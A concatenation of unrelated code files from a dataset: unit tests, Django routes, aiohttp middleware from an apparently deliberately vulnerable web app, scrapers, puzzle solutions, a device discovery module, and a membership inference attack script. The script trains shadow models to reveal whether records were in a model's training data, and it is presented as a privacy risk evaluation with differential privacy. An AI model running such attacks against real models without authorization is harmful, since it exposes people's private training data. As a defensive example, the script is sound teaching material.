master file is pointing to precisely the set of files specified by files\n and that it is pointing into the right hash directory.\n\n :param self: A TestCase with self.hash_path defined\n :param files:\n :return: None\n \"\"\"\n with open(f\"{self.hash_path}/master\", \"rt\") as f:\n for l in f.readlines():\n line = l.strip()\n if len(line) > 0:\n fpath, fname = path.split(line)\n self.assertEqual(fpath, self.hash_path, \"master file pointing to wrong directory\")\n self.assertIn(fname, files, f\"{fname} not among expected files in master\")\n if fname in files:\n files.remove(fname)\n self.assertEqual(len(files), 0, \"some files expected in master were not found\")\n\ndef test_link(self, daq_name):\n \"\"\"\n Test that the running directory is a link to the right hash file.\n\n :param self:\n :return:\n \"\"\"\n link_path = f\"{self.base_path}/{daq_name}/running\"\n self.assertTrue(path.lexists(link_path), \"running doesn't exist\")\n self.assertTrue(path.islink(link_path), \"running not a link\")\n print(f\"link path is: {link_path}\")\n real_path = path.realpath(link_path)\n print(f\"real path is: {real_path}\")\n real_hash_path = path.realpath(self.hash_path)\n # compare against the resolved hash path so both sides are normalized\n self.assertEqual(real_path, real_hash_path, f\"'running' link pointing to wrong path\")\n\nclass TargetTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"target_path\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n self.tearDown()\n\n def tearDown(self):\n shutil.rmtree(self.archive_path, ignore_errors=True)\n shutil.rmtree(f\"{self.base_path}/daq0\", ignore_errors=True)\n\n def test_default_paths(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with 
status {status}\")\n self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\n def test_specified_paths(self):\n status = os.system(f\"./checkdaqconfig.py -a {self.base_path}/target/daq/archive -m {self.base_path}/target/daq/master.in -i {self.base_path}/chans/daq -p {self.base_path}/target/gds/param -b {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with status {status}\")\n self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\nclass ReplaceTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"replace\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n shutil.rmtree(self.base_path, ignore_errors=True)\n shutil.copytree(get_test_dir(\"replace.base\"), self.base_path, symlinks=True)\n with open(f\"{self.base_path}/target/daq/master.in\", \"at\") as f:\n f.write(f\"\\n$base_path/test1.par\\n\")\n\n def tearDown(self):\n shutil.rmtree(self.base_path, ignore_errors=True)\n\n def test_replace_link(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with status {status}\")\n self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\nclass NotALinkTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"not_a_link\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n self.tearDown()\n\n def tearDown(self):\n shutil.rmtree(self.archive_path, ignore_errors=True)\n\n def test_not_a_link_blocks(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertNotEqual(status, 0, f\"default run should have failed\")\n self.assertFalse(path.islink(f\"{self.base_path}/daq0/running\"), \"should not be a link\")\n\nclass HardPathTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"hard_path\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n self.master_file = f\"{self.base_path}/target/daq/master.in\"\n self.tearDown()\n\n with open(self.master_file, \"wt\") as mf:\n mf.write(f\"{self.base_path}/chans1/daq/test1.ini\\n\")\n mf.write(f\"{self.base_path}/target/gds1/param/test1.par\\n\")\n\n def tearDown(self):\n shutil.rmtree(self.archive_path, ignore_errors=True)\n shutil.rmtree(f\"{self.base_path}/daq0\", ignore_errors=True)\n try:\n os.remove(self.master_file)\n except FileNotFoundError:\n pass\n\n def test_hardcoded_paths(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with status {status}\")\n 
self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ElsevierSoftwareX/SOFTX_2020_155","sub_path":"src/daqd/util/checkdaqconfig_test.py","file_name":"checkdaqconfig_test.py","file_ext":"py","file_size_in_byte":6609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37165896631","text":"\"\"\"Urls definitions for inventory app\"\"\"\nfrom django.urls import path\n\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom .views import GameViewSet\n\n\ngame_list = GameViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\ngame_detail = GameViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\ngame_get_by_genre = GameViewSet.as_view({\n 'get': 'get_by_genre'\n}, renderer_classes=[JSONRenderer])\n\ngame_get_by_score = GameViewSet.as_view({\n 'get': 'get_by_score'\n}, renderer_classes=[JSONRenderer])\n\ngame_get_by_price = GameViewSet.as_view({\n 'get': 'get_by_price'\n}, renderer_classes=[JSONRenderer])\n\nurlpatterns = format_suffix_patterns([\n path('', game_list, name='game-list'),\n path('/', game_detail, name='game-detail'),\n path('genres//', game_get_by_genre, name='game-by-genre'),\n path('scores/', game_get_by_score, name='game_by_score'),\n path('prices/', game_get_by_price, name='game_by_price'),\n])\n","repo_name":"Vitor-labs/Gamepy","sub_path":"backend/inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"30346800337","text":"n = int(input())\nwhile n > 0:\n data = input()\n a = \"\"\n b = \"\"\n for i in range(len(data)):\n if i % 2 == 0:\n a = a+data[i]\n else:\n b = b+data[i]\n print(f\"{a} {b}\")\n n = n-1\n","repo_name":"svrohith9/Algo-and-DS","sub_path":"python_codebase/LetsReview.py","file_name":"LetsReview.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2645688938","text":"import logging\n\nfrom aiohttp import web\nfrom aiohttp.web_exceptions import HTTPForbidden, HTTPInternalServerError\nfrom aiohttp_jinja2 import render_template\nfrom aiohttp_session import session_middleware as session_middleware_, get_session\nfrom aiohttp_session.redis_storage import RedisStorage\n\nlog = logging.getLogger(__name__)\n\n\n@web.middleware\nasync def session_middleware(request, handler):\n \"\"\"Wrapper to Session Middleware factory.\n \"\"\"\n # Do the trick, by passing app & handler back to original session\n # middleware factory. 
Do not forget to await on results here as original\n # session middleware factory is also awaitable.\n app = request.app\n storage = RedisStorage(app['redis'], httponly=False)\n middleware = session_middleware_(storage)\n return await middleware(request, handler)\n\n\n@web.middleware\nasync def csrf_middleware(request, handler):\n \"\"\"Provides csrf\"\"\"\n if request.method == \"POST\":\n session = await get_session(request)\n token = session.pop('_csrf_token', None)\n formdata = await request.post()\n if not token or token != formdata.get('_csrf_token'):\n log.error(\n 'Request to %s was aborted because CSRF tokens mismatched',\n request.rel_url\n )\n raise HTTPForbidden()\n return await handler(request)\n\n\ndef error_pages(overrides):\n @web.middleware\n async def middleware(request, handler):\n try:\n response = await handler(request)\n override = overrides.get(response.status)\n if override is None:\n return response\n else:\n return await override(request, response)\n except web.HTTPException as ex:\n override = overrides.get(ex.status)\n if override is None:\n raise\n else:\n return await override(request, ex)\n\n return middleware\n\n\nasync def handle_40x(request, exc):\n response = render_template('errors/40x.jinja2',\n request,\n {'error': exc})\n return response\n\n\nasync def handle_50x(request, exc):\n response = render_template('errors/50x.jinja2',\n request,\n {'error': exc})\n return response\n\n\nerror_middleware = error_pages({\n x: handle_40x if x < 500 else handle_50x\n for x in range(401, 600)\n})\n","repo_name":"anxolerd/dvpwa","sub_path":"sqli/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"5"} +{"seq_id":"37351052113","text":"import Logger\n\nclass training_data_validator:\n def __init__(self):\n self.log_writer=Logger.logger_tool()\n self.file_object = open(\"Logs.txt\", 'a+')\n\n def check_logger(self):\n try:\n self.log_writer.log_this(self.file_object,\"logging checked\")\n except Exception as e:\n raise e\n\n","repo_name":"yashnth19/first_project","sub_path":"training_data_validation.py","file_name":"training_data_validation.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34720705369","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom pandas import DataFrame as df\nimport time\ndef get_page_content(request_url):\n # fetch the page content (use the parameter, not the global url)\n headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'}\n html=requests.get(request_url,headers=headers,timeout=10)\n content = html.text\n # build a BeautifulSoup object from the content\n soup = BeautifulSoup(content, 'html.parser', from_encoding='utf-8')\n return soup\n# parse the complaint records on the current page\ndef analysis(soup):\n df_data = df(columns=['id', 'brand', 'car_model', 'type', 'desc', 'problem', 'datetime', 'status'])\n # the complete complaints table\n temp=soup.find('div',class_='tslb_b')\n # find all tr elements, i.e. the rows\n tr_list=temp.find_all('tr')\n for tr in tr_list:\n td_list=tr.find_all('td')\n # rows with td cells are data; the header row only has th cells\n if len(td_list)>0:\n temp_list=[]\n # complaint id, brand, car series, car model, problem summary, typical problem, complaint time, complaint status\n '''\n # the method shown by the teacher: append via a dict\n id,brand,car_model,type,desc,problem,datetime,status=\\\n td_list[0].text,td_list[1].text,td_list[2].text,td_list[3].text,\\\n td_list[4].text,td_list[5].text,td_list[6].text,td_list[7].text\n temp={}\n temp['id']=id\n temp['brand'] = brand\n 
temp['car_model'] = car_model\n temp['type'] = type\n temp['desc'] = desc\n temp['problem'] = problem\n temp['datetime'] = datetime\n temp['status'] = status\n df_data=df_data.append(temp,ignore_index=True)\n '''\n # print(id,brand,car_model,type,desc,problem,datetime,status)\n # here a list loop is used to append instead, which is a bit more concise\n for i in range(8):\n temp_list.append(td_list[i].text)\n df_data.loc[len(df_data)] = temp_list\n return df_data\n# start timing\ntime1=time.time()\nresult_df=df(columns=['id', 'brand', 'car_model', 'type', 'desc', 'problem', 'datetime', 'status'])\n# request URL\nbase_url = 'http://www.12365auto.com/zlts/0-0-0-0-0-0_0-0-'\n# set the number of pages to crawl\npage_num=20\nfor i in range(page_num):\n # build the page url\n url=base_url+str(i+1)+'.shtml'\n # parse with soup\n soup=get_page_content(url)\n # parsing yields the dataframe for the current page\n df_data=analysis(soup)\n result_df=result_df.append(df_data)\nresult_df.to_excel(\"car_complain_20210209.xlsx\",index=False)\nresult_df.to_csv(\"car_complain_20210209.csv\",index=False)\nprint(\"Total time: %s seconds.\" % (time.time()-time1))\n","repo_name":"fandy422/DataEngine","sub_path":"L2/car_complain_bs4.py","file_name":"car_complain_bs4.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41982823143","text":"'''\nIn this example we learn how to evaluate model risk for membership inference attacks (MIA), \nwhere adversaries are able to copy the principal model functionality and trigger adversarial attacks.\n\nThis risk assessment framework first uses public data (here we have used the adult_income dataset) to train a set of shadow models that can emulate/mimic a target model’s functionality. In the next step, an attack model is trained to reveal the membership status of a sample using outputs from the shadow models. At last we evaluate different attack model performance metrics to validate how accurately it has been crafted.\n'''\n\nimport numpy as np\nimport pandas as pd\n\n# depends on tensorflow 1.14\nimport tensorflow as tf\nprint(tf. 
__version__)\n\nfrom mia.estimators import ShadowModelBundle, prepare_attack_data\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils import resample\nfrom tensorflow import keras\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.regularizers import l1\n\nfrom tensorflow.keras.layers import Conv1D, AveragePooling1D, Dropout, Flatten, Dense, MaxPooling1D\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.regularizers import l1\nfrom tensorflow.keras.utils import to_categorical\n\n# privacy package\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score\n\nfrom tensorflow_privacy.privacy.optimizers.dp_optimizer_keras import DPKerasSGDOptimizer\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import compute_rdp\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import get_privacy_spent\n\n#privacy.optimizers.dp_optimizer import DPGradientDescentGaussianOptimizer tensorflow_privacy previous version compatible with 1.1.15\n\npath = '' # Use your system path till DP_memebrship_inference diectory\n\n# set random seed\nimport random\nrandom.seed(19122)\n\n# set random seed\nnp.random.seed(19122)\ntf.random.set_seed(19122)\n\nGradientDescentOptimizer = tf.compat.v1.train.GradientDescentOptimizer\n\ndef compute_epsilon(steps):\n \"\"\"Computes epsilon value for given hyperparameters.\"\"\"\n if noise_multiplier == 0.0:\n return float('inf')\n orders = [1 + x / 10. for x in range(1, 100)] + list(range(12, 64))\n sampling_probability = batch_size / 60000\n rdp = compute_rdp(q=sampling_probability,\n noise_multiplier=noise_multiplier,\n steps=steps,\n orders=orders)\n # Delta is set to 1e-5 because MNIST has 60000 training points.\n return get_privacy_spent(orders, rdp, target_delta=1e-5)[0]\n\ndef split_to_be_divisible(X, y, shadow_perc, batch_size):\n \"\"\"\n Split a dataframe into target dataset and shadow dataset, and make them divisible by batch size.\n\n :param X: genotype data\n :param y: phenotype data\n :param shadow_perc: specified percent for shadow dataset, target_perc = 1 - shadow_perc\n :param batch_size: batch_size for training process\n\n :return: target datasets, shadow datasets\n \"\"\"\n\n # stop and output error, if X and y have different number of individuals.\n assert y.shape[0] == X.shape[0]\n\n # calculate sample size of target and shadow\n total_row = X.shape[0]\n num_shadow_row = int(total_row * shadow_perc) - int(total_row * shadow_perc) % batch_size\n num_target_row = (total_row - num_shadow_row) - (total_row - num_shadow_row) % batch_size\n\n # split train and valid\n random_row = np.random.permutation(total_row)\n shadow_row = random_row[:num_shadow_row]\n target_row = random_row[-num_target_row:]\n\n print(target_row, shadow_row, random_row)\n\n target_X = X.iloc[target_row]\n shadow_X = X.iloc[shadow_row]\n\n target_y = y.iloc[target_row]\n shadow_y = y.iloc[shadow_row]\n\n return target_X, target_y, shadow_X, shadow_y\n\n\ndef target_model(input_shape):\n \"\"\"The architecture of the target model.\n The attack is white-box, hence the attacker is assumed to know this architecture too.\n\n :return: target model\n \"\"\"\n classifier = Sequential()\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu', input_shape=(input_shape)))\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu'))\n 
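# dropout and pooling regularize the target model; less overfitting also weakens the membership signal an attacker can exploit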
classifier.add(Dropout(0.5))\n classifier.add(MaxPooling1D(pool_size=2))\n classifier.add(Flatten())\n classifier.add(Dense(100, activation='relu'))\n classifier.add(Dense(2, activation='softmax'))\n\n\n if dpsgd:\n optimizer = DPKerasSGDOptimizer(\n l2_norm_clip=l2_norm_clip,\n noise_multiplier=noise_multiplier,\n num_microbatches=int(microbatches_perc * batch_size),\n learning_rate=learning_rate)\n # Compute vector of per-example loss rather than its mean over a minibatch.\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n else:\n optimizer = GradientDescentOptimizer(learning_rate=learning_rate)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n\n # Compile model with Keras\n classifier.compile(optimizer=optimizer, loss=loss, metrics=['accuracy'])\n\n return classifier\n\n\ndef shadow_model():\n \"\"\"The architecture of the shadow model is the same as the target model's, because the attack is white-box,\n hence the attacker is assumed to know this architecture too.\n\n :return: shadow model\n \"\"\"\n\n classifier = Sequential()\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu', input_shape=(shadow_input_shape)))\n classifier.add(Conv1D(filters=64, kernel_size=3, activation='relu'))\n classifier.add(Dropout(0.5))\n classifier.add(MaxPooling1D(pool_size=2))\n classifier.add(Flatten())\n classifier.add(Dense(100, activation='relu'))\n classifier.add(Dense(2, activation='softmax'))\n\n\n if dpsgd:\n optimizer = DPKerasSGDOptimizer(\n l2_norm_clip=l2_norm_clip,\n noise_multiplier=noise_multiplier,\n num_microbatches=int(microbatches_perc * batch_size),\n learning_rate=learning_rate)\n\n # Compute vector of per-example loss rather than its mean over a minibatch.\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n else:\n optimizer = GradientDescentOptimizer(learning_rate=learning_rate)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.compat.v2.losses.Reduction.NONE)\n\n # Compile model with Keras\n classifier.compile(optimizer=optimizer, loss=loss, metrics=['accuracy'])\n\n return classifier\n\n\ndef personal_income_classification():\n \"\"\"\n Load a dataset and encode categorical variables.\n\n \"\"\"\n df = pd.read_csv(path + \"data/adult.all.txt\", sep=\", \")\n print(df.shape)\n print(df.columns)\n\n # Renaming the columns\n df.columns = ['Age', 'Workclass', 'fnlwgt', 'Education', 'Education-num', 'Marital-status', 'Occupation',\n 'Relationship', 'Race', 'Sex', 'Capital-gain', 'Capital-loss',\n 'Hours-per-week', 'Native-country', 'Salary']\n\n df['Age'] = df['Age'].astype(np.float32)\n\n df['fnlwgt'] = df['fnlwgt'].astype(np.float32)\n df['Education-num'] = df['Education-num'].astype(np.float32)\n df['Capital-gain'] = df['Capital-gain'].astype(np.float32)\n df['Capital-loss'] = df['Capital-loss'].astype(np.float32)\n df['Hours-per-week'] = df['Hours-per-week'].astype(np.float32)\n\n df['Workclass'] = df['Workclass'].astype('category').cat.codes.astype(np.float32)\n df['Education'] = df['Education'].astype('category').cat.codes.astype(np.float32)\n df['Marital-status'] = df['Marital-status'].astype('category').cat.codes.astype(np.float32)\n df['Occupation'] = df['Occupation'].astype('category').cat.codes.astype(np.float32)\n df['Relationship'] = df['Relationship'].astype('category').cat.codes.astype(np.float32)\n df['Race'] = 
df['Race'].astype('category').cat.codes.astype(np.float32)\n df['Sex'] = df['Sex'].astype('category').cat.codes.astype(np.float32)\n df['Native-country'] = df['Native-country'].astype('category').cat.codes.astype(np.float32)\n df['Salary'] = df['Salary'].astype('category').cat.codes.astype(np.float32)\n\n df_train = df[\n ['Age', 'Workclass', 'fnlwgt', 'Education', 'Education-num', 'Marital-status', 'Occupation', 'Relationship',\n 'Race', 'Sex', 'Capital-gain', 'Capital-loss',\n 'Hours-per-week', 'Native-country']]\n\n df_test = df[['Salary']]\n print(df.head())\n return df_train, df_test\n\ndef main():\n print(\"Training the target model...\")\n # split target dataset to train and valid, and make them evenly divisible by batch size\n\n target_X_train, target_y_train, target_X_valid, target_y_valid = split_to_be_divisible(target_X,\n target_y,\n 0.2,\n batch_size)\n\n target_X_train = target_X_train.values.reshape((target_X_train.shape[0], target_X_train.shape[1], 1))\n target_X_valid = target_X_valid.values.reshape((target_X_valid.shape[0], target_X_valid.shape[1], 1))\n\n input_shape = (target_X_train.shape[1], target_X_train.shape[2])\n\n\n tm = target_model(input_shape)\n tm.fit(target_X_train,\n target_y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=[target_X_valid, target_y_valid],\n verbose=1)\n\n print(\"Training the shadow models.\")\n # train only one shadow model\n SHADOW_DATASET_SIZE = int(shadow_X.shape[0] / 2)\n smb = ShadowModelBundle(\n shadow_model,\n shadow_dataset_size=SHADOW_DATASET_SIZE,\n num_models=1,\n )\n # Train the shadow models with the same parameters as the target model, and generate the attack data...\n attacker_X, attacker_y = smb.fit_transform(shadow_X, shadow_y.values,\n fit_kwargs=dict(epochs=epochs,\n batch_size=batch_size,\n verbose=1),\n )\n\n print(\"Training attack model...\")\n clf = RandomForestClassifier(max_depth=2)\n clf.fit(attacker_X, attacker_y)\n\n # Test the success of the attack.\n ATTACK_TEST_DATASET_SIZE = unused_X.shape[0]\n # Prepare examples that were in the training, and out of the training.\n data_in = target_X_train[:ATTACK_TEST_DATASET_SIZE], target_y_train[:ATTACK_TEST_DATASET_SIZE]\n\n unused_X1 = unused_X.values.reshape((unused_X.shape[0], unused_X.shape[1], 1))\n\n data_out = unused_X1[:ATTACK_TEST_DATASET_SIZE], unused_y[:ATTACK_TEST_DATASET_SIZE]\n # Compile them into the expected format for the AttackModelBundle.\n attack_test_data, real_membership_labels = prepare_attack_data(tm, data_in, data_out)\n\n # Compute the attack accuracy.\n attack_guesses = clf.predict(attack_test_data)\n attack_accuracy = np.mean(attack_guesses == real_membership_labels)\n print('attack accuracy: {}'.format(attack_accuracy))\n acc = accuracy_score(real_membership_labels, attack_guesses)\n print('attack acc: {}'.format(acc))\n\n prec = precision_score(real_membership_labels, attack_guesses)\n print('Precision: {}'.format(prec))\n\n recall = recall_score(real_membership_labels, attack_guesses)\n print('Recall: {}'.format(recall))\n\n fscore = f1_score(real_membership_labels, attack_guesses)\n print('F1-Score: {}'.format(fscore))\n\n\nif __name__ == '__main__':\n\n # parameters\n dpsgd = True\n\n # target model hyper-parameters same as Lasso-dp\n epochs = 10\n batch_size = 8\n microbatches_perc = .5\n learning_rate = 0.01\n kernel_regularization = 1.2 #0.001352\n noise_multiplier = 1.4\n l2_norm_clip = 1.8 #1.0\n\n drop_prec = 0.25\n num_kernels = 8\n kernel_size = 5\n\n X, y = personal_income_classification()\n target_X, target_y, 
shadow_X, shadow_y = split_to_be_divisible(X, y, 0.5, batch_size=80)\n\n\n shadow_X, shadow_y, unused_X, unused_y = split_to_be_divisible(shadow_X,\n shadow_y,\n 0.3,\n batch_size)\n\n\n shadow_X = shadow_X.values.reshape((shadow_X.shape[0], shadow_X.shape[1], 1))\n shadow_input_shape = (shadow_X.shape[1], shadow_X.shape[2])\n main()\n\n sampling_probability = batch_size / 50000\n steps = epochs * 50000 // batch_size\n orders = [1 + x / 10. for x in range(1, 100)] + list(range(12, 64))\n rdp = compute_rdp(q=sampling_probability,\n noise_multiplier=noise_multiplier,\n steps=steps,\n orders=orders)\n\n epsilon = get_privacy_spent(orders, rdp, target_delta=1e-5)[0]\n print(\"Privacy Budget Epsilon\", epsilon)\n\n # param_grid = {\n # 'epochs': [50, 100],\n # 'batch_size': [8, 16],\n # 'microbatches_perc': [0.5, 1],\n # 'learning_rate': [0.01, 0.001],\n # 'kernel_regularization': [0, 0.001352],\n # 'noise_multiplier': [0.4, 0.6, 0.8, 1.0, 1.2],\n # 'l2_norm_clip': [0.6, 1.0, 1.4, 1.8],\n # 'verbose': [0]\n # }\n","repo_name":"PacktPublishing/Designing-Models-for-Responsible-AI","sub_path":"Chapter2/membership_inference/CNN-DP-membership-inference.py","file_name":"CNN-DP-membership-inference.py","file_ext":"py","file_size_in_byte":13706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"72083786073","text":"N = int(input())\nballoon = list(map(int, input().split()))\nidx = 0\ncnt = 0\n\nwhile cnt < N - 1:\n print(idx + 1, end=\" \")\n paper = balloon[idx]\n goto = 1 if paper > 0 else -1\n paper *= goto\n balloon[idx] = 0\n \n step = 0\n\n while step < paper:\n idx += goto\n if idx >= N:\n idx -= N\n elif idx < 0:\n idx += N\n\n if balloon[idx] != 0:\n step += 1\n \n cnt += 1\n\nprint(idx + 1)\n","repo_name":"eora21/dj2_alg_study","sub_path":"python/b2346.py","file_name":"b2346.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4534434584","text":"# Goal = Given two strings, return true if string in ransomNote can be constructed from magazine.\n\n# track number of occurrences in magazine\n# iterate thru magazine\n# update tracker with chars in magazine\n# iterate thru ransomNote\n# check if char exists in tracker\n# if so, decrement\n# otherwise return false\n# return true if false is not triggered\n\nclass Solution:\n def canConstruct(self, ransomNote: str, magazine: str) -> bool:\n tracker = {}\n \n for char in magazine:\n if char in tracker:\n tracker[char] += 1\n else:\n tracker[char] = 1\n \n for char in ransomNote:\n if char in tracker and tracker[char] != 0:\n tracker[char] -= 1\n else:\n return False\n \n return True\n\n# Time complexity = O(N)\n# Space complexity = O(N)\n","repo_name":"kevin-the-engi/leetcode-solutions","sub_path":"solutions/ransom-note/ransom-note.py","file_name":"ransom-note.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8990505762","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\n\n# homepage URL of the novel\nhome = 'https://www.biquwx.la/10_10218/'\n\n# fetch the content of one page\ndef one_page(url):\n\n # disguise the request as a browser\n headers = {\n # user agent string\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'\n }\n\n r =requests.get(url,headers=headers,stream=True)\n # normalize the encoding to utf-8\n r.encoding = 'utf-8'\n\n soup = BeautifulSoup(r.text,'html.parser')\n # chapter title\n 
title = soup.find('div',class_='bookname').find('h1').text\n\n content = soup.find('div',id='content') # the novel's text content\n content = str(content)\n\n # content filtering\n content = content.replace('
    ','')\n content = content.replace('
    ','\\n')\n content = content.replace('
    ','\\n')\n content = content.replace('','')\n content = content.replace('
    ','')\n\n # 把内容都分开存到单独的txt文件中\n # with open(title+'.txt','a+', encoding='utf-8') as f:\n # f.write(content)\n\n print(title +'爬取完成~')\n return content,title\n\n\nfor i in range(5001501,5001505): # 结局:5002115\n url =home+str(i)+'.html' # https://www.biquwx.la/10_10218/5001501.html\n time.sleep(1.5)\n content,title = one_page(url)\n # 把内容都放到一个txt文件中\n with open('斗罗大陆.txt','a+', encoding='utf-8') as f:\n f.write('\\r'+title+'\\r'+content)","repo_name":"ZhangTongLe/Python_Auto_pri","sub_path":"Day2/斗罗大陆.py","file_name":"斗罗大陆.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2740400958","text":"\"\"\"\r\nThe itach driver discovery functions.\r\n\r\n\"\"\"\r\n\r\nimport logging\r\nimport socket\r\nimport struct\r\nimport time\r\nimport sys\r\nfrom typing import Callable\r\n\r\nimport pytach.const\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nasync def iTachDiscover(callback:Callable[[dict],None], timeout:int = 0) -> None:\r\n _LOGGER.debug(\"Starting discovery...\")\r\n\r\n # Setup the initial socket\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\r\n\r\n # Allow reuse\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n\r\n # Bind\r\n sock.bind(('',pytach.const.UDP_PORT))\r\n\r\n # Let the router/switch know that we want to recieve traffic\r\n group = socket.inet_aton(pytach.const.UDP_IP)\r\n mreq = struct.pack('4sL', group, socket.INADDR_ANY)\r\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\r\n\r\n # Endless loop of traffic\r\n stoptime = False\r\n if timeout:\r\n stoptime = time.time() + timeout\r\n\r\n def decodeMessage(data):\r\n ret = False\r\n try:\r\n tokens = data.split(\"<-\")\r\n for tok in tokens:\r\n pairs = tok.split(\"=\")\r\n if len(pairs) == 2:\r\n name = pairs[0].strip()\r\n val = pairs[1].strip()[:-1]\r\n\r\n if not ret:\r\n ret = {}\r\n\r\n ret[name] = val\r\n except:\r\n _LOGGER.warn(\"Exception decoding discovery message: %s\", sys.exc_info())\r\n\r\n return ret\r\n\r\n while True:\r\n try:\r\n _LOGGER.debug(\"Wating for message...\")\r\n data, address = sock.recvfrom(1024)\r\n _LOGGER.debug(\"Received %s bytes from %s: %s\", len(data), address, data)\r\n \r\n ret = decodeMessage(data.decode(\"utf-8\"))\r\n if ret:\r\n _LOGGER.debug(\"Decoded discovery: %s\",ret)\r\n\r\n typ = False\r\n\r\n if ret[\"Model\"] == \"iTachIP2IR\":\r\n typ = pytach.const.TYPE_IR\r\n elif ret[\"Model\"] == \"iTachIP2SL\":\r\n typ = pytach.const.TYPE_SL\r\n\r\n if typ:\r\n data = {\r\n pytach.const.CONF_NAME: 